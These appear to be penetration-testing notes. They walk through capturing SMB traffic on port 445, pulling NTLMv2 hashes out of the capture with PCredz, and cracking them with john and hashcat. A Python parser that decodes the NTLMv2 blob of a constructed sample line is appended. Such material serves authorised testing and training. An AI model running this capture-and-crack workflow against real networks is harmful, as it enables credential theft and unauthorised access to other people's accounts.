capture:
> tcpdump -nv -s0 -w /tmp/winauth.pcap port 445
-s0 means grab the whole packet (no truncation). options go before the filter expression; a second "port 445" after -w is a syntax error. matters mainly on older tcpdump builds whose default snaplen was only 68/96 bytes; modern builds already capture full packets by default.
connect:
> smbclient //10.10.10.10/c$ Server1 -U bob
scan:
> cd /opt/PCredz/
> ./Pcredz -v -f /tmp/winauth.pcap
trim:
> cat CredentialsDump-Session.log
> grep bob CredentialsDump-Session.log | cut -d ' ' -f 5 | tee hash.txt
> cat hash.txt
crack:
> john hash.txt ..done!!
> hashcat -w 3 -a 0 -m 5600 hash.txt ..done!!
> cat ~/.hashcat/hashcat.potfile
or, the more verbose way:
> hashcat -m 5600 --potfile-path ~/.hashcat/hashcat.potfile --show --outfile-format 2 hash.txt
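added example, not part of the original notes or of PCredz/hashcat: a parser for the -m 5600 line that hash.txt holds (user::domain:server_challenge:ntproofstr:blob). it decodes the NTLMv2 blob (MS-NLMP NTLMv2_CLIENT_CHALLENGE) so an analyst can see the timestamp and the AV_PAIR target info (which server/domain the victim was authenticating to) before deciding whether a capture is worth escalating. the sample line is constructed in the block, not a real capture.

```python
import struct
from datetime import datetime, timedelta, timezone

# AvId values from MS-NLMP section 2.2.2.1 (AV_PAIR)
AV_NAMES = {0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
            3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
            6: "MsvAvFlags", 7: "MsvAvTimestamp", 9: "MsvAvTargetName"}
UTF16_AVS = {1, 2, 3, 4, 5, 9}

def filetime_to_datetime(ft):
    # FILETIME: 100ns ticks since 1601-01-01 UTC
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_5600(line):
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("not a hashcat -m 5600 line")
    user, _, domain, srv_chal, proof, blob_hex = parts
    if len(srv_chal) != 16 or len(proof) != 32:
        raise ValueError("bad server challenge / NTProofStr length")
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":          # RespType / HiRespType must both be 1
        raise ValueError("not an NTLMv2 response blob")
    ts, client_chal = struct.unpack_from("<Q8s", blob, 8)  # TimeStamp, ChallengeFromClient
    av, off = {}, 28                     # AvPairs start after Reserved3
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:                   # MsvAvEOL terminates the list
            break
        val = blob[off:off + av_len]
        off += av_len
        av[AV_NAMES.get(av_id, f"AvId{av_id}")] = (
            val.decode("utf-16-le") if av_id in UTF16_AVS else val.hex())
    return {"user": user, "domain": domain, "server_challenge": srv_chal,
            "ntproofstr": proof, "timestamp": filetime_to_datetime(ts),
            "client_challenge": client_chal.hex(), "target_info": av}

def build_sample_line():
    # constructed sample line (hypothetical values), laid out exactly as a real one
    ts = 132000000000000000
    av = b"".join(struct.pack("<HH", i, 2 * len(s)) + s.encode("utf-16-le") for i, s in
                  ((1, "SERVER1"), (2, "CORP"), (3, "server1.corp.local"), (4, "corp.local")))
    av += struct.pack("<HHQ", 7, 8, ts) + struct.pack("<HH", 0, 0)
    blob = b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", ts) + b"\xaa" * 8 + b"\x00" * 4 + av + b"\x00" * 4
    return f"bob::CORP:{'11' * 8}:{'22' * 16}:{blob.hex()}"

if __name__ == "__main__":
    for k, v in parse_5600(build_sample_line()).items():
        print(f"{k}: {v}")
```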